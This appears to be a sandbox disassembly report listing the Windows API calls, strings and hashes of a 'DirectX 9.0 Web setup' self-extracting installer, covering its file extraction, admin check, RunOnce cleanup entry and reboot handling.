                                                                                                  • Part of subcall function 01002ACD: lstrlenA.KERNEL32(00000104,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002ADB
                                                                                                  • Part of subcall function 01002ACD: lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AE2
                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000,?,?,?,?,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 0100492B
                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01004953
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B17C,AA4CA1C3,?,?,010049D8,?), ref: 01002E3E
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B280,FFFFE48F,?,?,010049D8,?), ref: 01002E48
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B384,0175C085,?,?,010049D8,?), ref: 01002E52
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$AttributesFileItemText
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 1052324692-1193786559

                                                                                                APIs
                                                                                                • DosDateTimeToFileTime.KERNEL32(?,00000104,00000104), ref: 01002DAE
                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01002DC0
                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 01002DDC
                                                                                                Similarity
                                                                                                • API ID: Time$File$DateLocal
                                                                                                • String ID:
                                                                                                • API String ID: 2071732420-0

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,010045E9,00000000,00020019,010045E9,00000000,?,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000), ref: 01001E6E
                                                                                                • RegQueryValueExA.KERNELBASE(010045E9,0100290E,00000000,00000000,00000000,?,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000,0100290E), ref: 01001E85
                                                                                                • RegCloseKey.KERNELBASE(010045E9,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000,0100290E,010045E9,?), ref: 01001E95
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                • CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3191087442-0
                                                                                                APIs
                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100596D
                                                                                                  • Part of subcall function 01003D9A: LocalAlloc.KERNEL32(00000040,00000001,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000,01005A22,00000000,01005ACB,?,?), ref: 01003DB5
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01005968
                                                                                                Similarity
                                                                                                • API ID: AllocCurrentDirectoryLocal
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 4261067767-1193786559
                                                                                                APIs
                                                                                                • CreateFileA.KERNELBASE(01003CBD,00000000,00000000,00000000,0000017D,00000080,00000000,00000000,00000000,?,00000000,01003C3C,00000180,00008000,?), ref: 01003B74
                                                                                                • CreateFileA.KERNEL32(01003CBD,00000000,00000000,00000000,0000017D,00000080,00000000,01003CBD,?,00000000,01003C3C,00000180,00008000,?,?,01003CBD), ref: 01003B92
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
APIs
  • Part of subcall function 0100288F: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 010028B3
  • Part of subcall function 0100288F: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028C5
  • Part of subcall function 0100288F: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028E8
• WriteFile.KERNELBASE(?,?,?,00000000), ref: 01002C59
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 01004127
  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
Similarity
• API ID: ErrorLast$DirectoryMessageWindows
• String ID:
• API String ID: 824312211-0
APIs
• GetFileAttributesA.KERNELBASE(?,010023AD,?), ref: 01005BCE
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
  • Part of subcall function 01004C18: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01004C87
  • Part of subcall function 01004C18: SetEvent.KERNEL32(00000000,?,00000000), ref: 01004C93
• CloseHandle.KERNEL32(00000000,01005ACB,?,?,01005ACB,00000000), ref: 01005A50
  • Part of subcall function 010058FE: SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100596D
  • Part of subcall function 01002EAF: SetFileAttributesA.KERNEL32(00771048,00000080,?,?,00000000), ref: 01002EE4
  • Part of subcall function 01002EAF: DeleteFileA.KERNEL32(00771048,?,?,00000000), ref: 01002EEC
  • Part of subcall function 01002EAF: LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EF7
  • Part of subcall function 01002EAF: LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EFA
  • Part of subcall function 01002EAF: lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01002F25
  • Part of subcall function 01002EAF: SetCurrentDirectoryA.KERNEL32(01001284,?,00000000), ref: 01002F43
  • Part of subcall function 0100263F: ExitWindowsEx.USER32(00000002,00000000), ref: 01002681
Similarity
• API ID: CurrentDirectoryEventFileFreeLocal$AttributesCloseCreateDeleteExitHandleWindowslstrcpy
• String ID:
• API String ID: 2109604340-0
APIs
• CloseHandle.KERNELBASE(?,00000000,00000000,01003CF6,00000000,?,?,?,?,?,00000000), ref: 01002CEB
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 01002E09
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
APIs
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
APIs
• lstrcpyA.KERNEL32(?,00000000,00000001,DirectX 9.0 Web setup,00000000), ref: 01001CAD
• lstrcatA.KERNEL32(?,0100128C), ref: 01001CC1
• FindFirstFileA.KERNEL32(?,?), ref: 01001CD1
• lstrcpyA.KERNEL32(?,00000000), ref: 01001CEB
• lstrcmpA.KERNEL32(?,01001288), ref: 01001D02
• lstrcmpA.KERNEL32(?,01001284), ref: 01001D18
• lstrcatA.KERNEL32(?,?), ref: 01001D30
  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
• lstrcatA.KERNEL32(?,?), ref: 01001D59
• SetFileAttributesA.KERNEL32(?,00000080), ref: 01001D67
• DeleteFileA.KERNEL32(?), ref: 01001D74
• FindNextFileA.KERNEL32(00000000,00000010), ref: 01001D84
• FindClose.KERNEL32(00000000), ref: 01001D95
• RemoveDirectoryA.KERNEL32(00000000), ref: 01001D9C
Strings
Similarity
• API ID: File$Findlstrcatlstrcpy$lstrcmp$AttributesCharCloseDeleteDirectoryFirstNextPrevRemovelstrlen
• String ID: DirectX 9.0 Web setup
• API String ID: 2233361564-3102400635
APIs
  • Part of subcall function 010015F6: LoadLibraryA.KERNEL32(advapi32.dll,00000000,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100161A
  • Part of subcall function 010015F6: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0100162E
  • Part of subcall function 010015F6: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,DirectX 9.0 Web setup,?,?,010016C1), ref: 0100165E
  • Part of subcall function 010015F6: FreeSid.ADVAPI32(00000000,?,?,010016C1), ref: 01001672
  • Part of subcall function 010015F6: FreeLibrary.KERNEL32(010016C1,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100167C
• GetCurrentProcess.KERNEL32(00000008,?,?,00000000,?,01004E0E,?,?,00000000), ref: 010016CF
• OpenProcessToken.ADVAPI32(00000000,?,01004E0E,?,?,00000000), ref: 010016D6
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,00000000,00000001,?,01004E0E,?,?,00000000), ref: 010016F6
• GetLastError.KERNEL32(?,01004E0E,?,?,00000000), ref: 01001700
• LocalAlloc.KERNEL32(00000000,00000000,DirectX 9.0 Web setup,?,01004E0E,?,?,00000000), ref: 01001714
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,00000000,?,01004E0E,?,?,00000000), ref: 0100172D
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,01004E0E,?,?,00000000), ref: 0100174A
• EqualSid.ADVAPI32(00000004,?,?,01004E0E,?,?,00000000), ref: 01001760
• FreeSid.ADVAPI32(?,?,01004E0E,?,?,00000000), ref: 01001782
• LocalFree.KERNEL32(00000000,?,01004E0E,?,?,00000000), ref: 01001789
• CloseHandle.KERNEL32(?,?,01004E0E,?,?,00000000), ref: 01001793
Strings
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?), ref: 01005D57
                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 01005D85
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 01005DA4
                                                                                                • RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?,?), ref: 01005DC5
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01005DD0
                                                                                                  • Part of subcall function 01005C1C: CharNextA.USER32(?,00000000,01005DE8,?,?), ref: 01005C55
                                                                                                Strings
                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 01005D9A
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000000,?,?,01005ACB,00000000), ref: 010018C2
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010018C9
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 010018EB
                                                                                                • AdjustTokenPrivileges.ADVAPI32(00000004,00000000), ref: 0100190A
                                                                                                APIs
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 01002681
                                                                                                  • Part of subcall function 010018B5: GetCurrentProcess.KERNEL32(00000028,00000004,00000000,?,?,01005ACB,00000000), ref: 010018C2
                                                                                                  • Part of subcall function 010018B5: OpenProcessToken.ADVAPI32(00000000), ref: 010018C9
                                                                                                APIs
                                                                                                • CharNextA.USER32(00000000,00000001,DirectX 9.0 Web setup,00000000), ref: 010030FC
                                                                                                • GetModuleFileNameA.KERNEL32(0100B99E,00000104,00000001,DirectX 9.0 Web setup,00000000), ref: 010031AB
                                                                                                • CharUpperA.USER32(?), ref: 010031F2
                                                                                                • CharUpperA.USER32(-0000004F), ref: 0100327E
                                                                                                • lstrcmpiA.KERNEL32(RegServer,?), ref: 010032FB
                                                                                                • CharUpperA.USER32(?), ref: 0100332C
                                                                                                • CharUpperA.USER32(-0000004E), ref: 01003390
                                                                                                • lstrlenA.KERNEL32(0000002F), ref: 010033F4
                                                                                                • CharUpperA.USER32(?,0000002F,00000000), ref: 0100341F
                                                                                                • lstrcpyA.KERNEL32(0100B89A,0000002F), ref: 01003445
                                                                                                • lstrlenA.KERNEL32(0000002F), ref: 010034A7
                                                                                                • lstrcpyA.KERNEL32(0100BAA2,0000002F,0000002F,00000000,0000002F,0000005D,0000002F,0000005B), ref: 01003510
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 01003527
                                                                                                • ExitProcess.KERNEL32 ref: 0100352F
                                                                                                APIs
                                                                                                  • Part of subcall function 01002AA6: LoadStringA.USER32(?,00000200,?,LoadString() Error. Could not load string resource.), ref: 01002AC1
                                                                                                • MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                • lstrlenA.KERNEL32(0000007F,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 01003963
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0100396A
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01003975
                                                                                                • LocalAlloc.KERNEL32(00000040,00000064), ref: 0100397E
                                                                                                • wsprintfA.USER32 ref: 01003998
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 010039B2
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 010039BD
                                                                                                • LocalAlloc.KERNEL32(00000040,00000064), ref: 010039C6
                                                                                                • wsprintfA.USER32 ref: 010039E1
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 010039F3
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 010039FD
                                                                                                • lstrcpyA.KERNEL32(00000000,00000000), ref: 01003A15
                                                                                                • MessageBeep.USER32(?), ref: 01003A1E
                                                                                                • MessageBoxA.USER32(00000000,00000000,DirectX 9.0 Web setup,00000000), ref: 01003A5E
                                                                                                • LocalFree.KERNEL32(00000000), ref: 01003A67
                                                                                                  • Part of subcall function 01005D22: GetVersionExA.KERNEL32(?), ref: 01005D57
                                                                                                  • Part of subcall function 01005D22: GetSystemMetrics.USER32(0000004A), ref: 01005D85
                                                                                                  • Part of subcall function 01005D22: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 01005DA4
                                                                                                  • Part of subcall function 01005D22: RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?,?), ref: 01005DC5
                                                                                                  • Part of subcall function 01005D22: RegCloseKey.ADVAPI32(?), ref: 01005DD0
                                                                                                APIs
                                                                                                • LoadStringA.USER32(000003E8,0100A640,00000200), ref: 01004EAF
                                                                                                • GetDesktopWindow.USER32 ref: 01005009
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 0100501F
                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01005038
                                                                                                • GetDlgItem.USER32(?,00000836), ref: 01005051
                                                                                                • EnableWindow.USER32(00000000), ref: 01005058
                                                                                                • EndDialog.USER32(?,00000000), ref: 01005065
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DirectX 9.0 Web setup
                                                                                                • API String ID: 2418873061-318513791
                                                                                                • Opcode ID: 631fb0b2ebf77da2618df05cbc4a49d4bbcce4c3538e6841af407c24bcd3fbff
                                                                                                • Instruction ID: 5d03767cd6d44e1ff7b95dfa45677d46a9542d139ef34e3ffbaad0eb8858980f
                                                                                                • Opcode Fuzzy Hash: 631fb0b2ebf77da2618df05cbc4a49d4bbcce4c3538e6841af407c24bcd3fbff
                                                                                                • Instruction Fuzzy Hash: EF519070241745BAF6735B668C4CFAF2EACEB86B45F004018B7C5EA0C5DAB9C611C7B8
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(00000000), ref: 010050B2
                                                                                                • EndDialog.USER32(?,?), ref: 010050BE
                                                                                                • ResetEvent.KERNEL32 ref: 010050DF
                                                                                                • SetEvent.KERNEL32(000004B2,01001251,00000000,00000020,00000004), ref: 0100510F
                                                                                                • GetDesktopWindow.USER32 ref: 01005146
                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 01005176
                                                                                                • SendMessageA.USER32(00000000,?,?,00000000), ref: 0100517F
                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 01005191
                                                                                                • SendMessageA.USER32(00000000,?,?,00000000), ref: 01005194
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 010051A2
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000049DB,00000000,00000000,0100AA48), ref: 010051B6
                                                                                                • EndDialog.USER32(?,00000000), ref: 010051D7
                                                                                                • EndDialog.USER32(?,00000000), ref: 010051FC
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Dialog$EventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2636921890-3102400635
                                                                                                • Opcode ID: 2e5909da755b8dd92093ec91b293cd0599467003ecf1b2f192f568b12a924e3b
                                                                                                • Instruction ID: 23f09e72cf5f3eaed0e006cdafc8c359d8237540093a3079cf3abfc6ea3c4f62
                                                                                                • Opcode Fuzzy Hash: 2e5909da755b8dd92093ec91b293cd0599467003ecf1b2f192f568b12a924e3b
                                                                                                • Instruction Fuzzy Hash: 0A415F31641225FBFB331B689C49EAA3EA8EB46B50F004011F6C5A64D9C77A9951CFD4
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,0100A640,0100A338,?), ref: 010046E2
                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 01004703
                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 01004716
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 01004729
                                                                                                • GetTempPathA.KERNEL32(00000104,0100AA80), ref: 01004749
                                                                                                • lstrlenA.KERNEL32(0100AA80), ref: 01004750
                                                                                                • CharPrevA.USER32(0100AA80,00000000), ref: 01004760
                                                                                                • CharPrevA.USER32(0100AA80,00000000), ref: 0100476C
                                                                                                • lstrcpyA.KERNEL32(?,0100AA80), ref: 010047BD
                                                                                                • FreeLibrary.KERNEL32(?), ref: 010047CC
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 010047DC
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemplstrcpylstrlen
                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                • API String ID: 2439948570-1731843650
                                                                                                • Opcode ID: 3324b512f0aa79aaecc928bbb591f72aff6d5178d9e94c9ee451a4be34d2a9a1
                                                                                                • Instruction ID: 193eb6bc1a1b02d365b45401d2cfe27bf2cb542b23eb453a0d77d81c3b9a3dce
                                                                                                • Opcode Fuzzy Hash: 3324b512f0aa79aaecc928bbb591f72aff6d5178d9e94c9ee451a4be34d2a9a1
                                                                                                • Instruction Fuzzy Hash: 3F315EB1A01258BFEB139F69CC88DAE7FB8BF0A340F554069F688E6180C7758945CB65
                                                                                                APIs
                                                                                                • CharUpperA.USER32(?,00000001,?,00000000), ref: 010020A8
                                                                                                • CharNextA.USER32(?), ref: 010020B7
                                                                                                • CharNextA.USER32(00000000), ref: 010020BA
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000), ref: 01002110
                                                                                                • RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?), ref: 01002133
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0100214E
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 01002162
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01002176
                                                                                                • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010020EA
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,?), ref: 01002184
                                                                                                • GetSystemDirectoryA.KERNEL32(?,?), ref: 01002198
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010020D6
                                                                                                Similarity
                                                                                                • API ID: Char$lstrcpy$DirectoryNext$CloseEnvironmentExpandOpenPrevQueryStringsSystemUpperValueWindowslstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                • API String ID: 347548745-2428544900
                                                                                                • Opcode ID: a6771fd5372bea0d88a9c6ef6506abc8c0f7b881c05286ce2042d5bdc15aa5be
                                                                                                • Instruction ID: d6a3e7514927295ec277a6c60e19e56b03ab3a9e12423da05e88d21a123d547c
                                                                                                • Opcode Fuzzy Hash: a6771fd5372bea0d88a9c6ef6506abc8c0f7b881c05286ce2042d5bdc15aa5be
                                                                                                • Instruction Fuzzy Hash: E0314A79900248BFEF228F64CC48FEE7BBDAF15350F008095FA84A6090D7B5DA958F90
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000000), ref: 01001BB7
                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,00000000,7591F530), ref: 01001BE3
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01001C12
                                                                                                • wsprintfA.USER32 ref: 01001C46
                                                                                                • lstrlenA.KERNEL32(?), ref: 01001C56
                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,00000001), ref: 01001C6C
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01001C75
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Valuelstrlen$CharCloseDirectoryOpenPrevQuerySystemlstrcpywsprintf
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                • API String ID: 11565330-2874043782
                                                                                                • Opcode ID: 5599e54c7d9c30600de5d0d1969bc1e94db08515ae13c163f555adafc5244e2b
                                                                                                • Instruction ID: 2fb7fcdbff80cae6b570ff950ba8ccadd0e573114065fe0f363dccfd66d38777
                                                                                                • Opcode Fuzzy Hash: 5599e54c7d9c30600de5d0d1969bc1e94db08515ae13c163f555adafc5244e2b
                                                                                                • Instruction Fuzzy Hash: 25215375A4021CBBEB22DBA5DD49FDABB7CEB08740F0000A5F689E6081D7B5DB448F60
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 0100358A
                                                                                                • FindResourceA.KERNEL32(00000000,?,0000000A), ref: 01003596
                                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035AB
                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035B2
                                                                                                • lstrlenA.KERNEL32(00000008,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035CD
                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035E7
                                                                                                • wsprintfA.USER32 ref: 010035FC
                                                                                                • FindResourceA.KERNEL32(00000000,?,0000000A), ref: 01003609
                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 01003628
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Resource$FindFreewsprintf$LoadLocklstrlen
                                                                                                • String ID: UPDFILE%lu
                                                                                                • API String ID: 3821519360-2329316264
                                                                                                • Opcode ID: cefe3b29808c0de11ca19ee608c6f983850b7a9791d33d4cc506cee2b882d878
                                                                                                • Instruction ID: 67bd43b507032c87e08e44f5702343a162528d16cb23afe419e5d1f44a4bfc8c
                                                                                                • Opcode Fuzzy Hash: cefe3b29808c0de11ca19ee608c6f983850b7a9791d33d4cc506cee2b882d878
                                                                                                • Instruction Fuzzy Hash: C8215171A00209AFDB12DFD5DC88AEEBBF8FB48701F108055F585E6144D776D6008B61
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000104,00000104,00000000,759183C0), ref: 01002235
                                                                                                • IsDBCSLeadByte.KERNEL32(00000000,?,7591E800), ref: 01002256
                                                                                                • CharNextA.USER32(?,?,7591E800), ref: 01002270
                                                                                                • CharUpperA.USER32(00000000,?,7591E800), ref: 01002278
                                                                                                • lstrlenA.KERNEL32(?,?,?,7591E800), ref: 01002291
                                                                                                • CharPrevA.USER32(?,?,?,7591E800), ref: 0100229D
                                                                                                • CharUpperA.USER32(00000000,?,7591E800), ref: 010022B5
                                                                                                • lstrcpyA.KERNEL32(?,?,?,7591E800), ref: 010022C5
                                                                                                • lstrlenA.KERNEL32(?,?,7591E800), ref: 010022D0
                                                                                                • CharNextA.USER32(?,?,7591E800), ref: 010022DC
                                                                                                • CharNextA.USER32(?,?,7591E800), ref: 010022E1
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Upperlstrlen$ByteFileLeadModuleNamePrevlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2740425872-0
                                                                                                • Opcode ID: 6f55dd0f941396175fb476c6ce2b428a4e45a6200b6cc63fadfff151ab2f4b34
                                                                                                • Instruction ID: c065ed5666d739eb8cb46574119231d274ae865d8c51cf87fce0dafe64722b0d
                                                                                                • Opcode Fuzzy Hash: 6f55dd0f941396175fb476c6ce2b428a4e45a6200b6cc63fadfff151ab2f4b34
                                                                                                • Instruction Fuzzy Hash: B631B1714083816FE773DFB88848BAABBEC6F4A700F58489AE5D0D3182D779D445CB66
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,00000000), ref: 010037A8
                                                                                                • GetDesktopWindow.USER32 ref: 010037B8
                                                                                                • SetDlgItemTextA.USER32(?,00000834,?), ref: 010037D5
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 010037E1
                                                                                                • SetForegroundWindow.USER32(?), ref: 010037E8
                                                                                                • GetDlgItem.USER32(?,00000834), ref: 010037F5
                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 01003822
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemWindow$Text$DesktopDialogForegroundMessageSend
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 3995847246-3102400635
                                                                                                • Opcode ID: 0416d64abb4ccf835619947f66294db8555aab5d7019f45f1413da29fbb76d96
                                                                                                • Instruction ID: 01c3b69a9c1d9b51098dd75da9e10fd26e27e0a568cfd527d8e7b98c3a4c5e06
                                                                                                • Opcode Fuzzy Hash: 0416d64abb4ccf835619947f66294db8555aab5d7019f45f1413da29fbb76d96
                                                                                                • Instruction Fuzzy Hash: DB116A35144305AFFB735F68DC4CBAA3AA4FB4AB61F000165F5D9991C4C7BA8281D791
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000000,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100161A
                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0100162E
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,DirectX 9.0 Web setup,?,?,010016C1), ref: 0100165E
                                                                                                • FreeSid.ADVAPI32(00000000,?,?,010016C1), ref: 01001672
                                                                                                • FreeLibrary.KERNEL32(010016C1,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100167C
                                                                                                Strings
                                                                                                Memory Dump Source
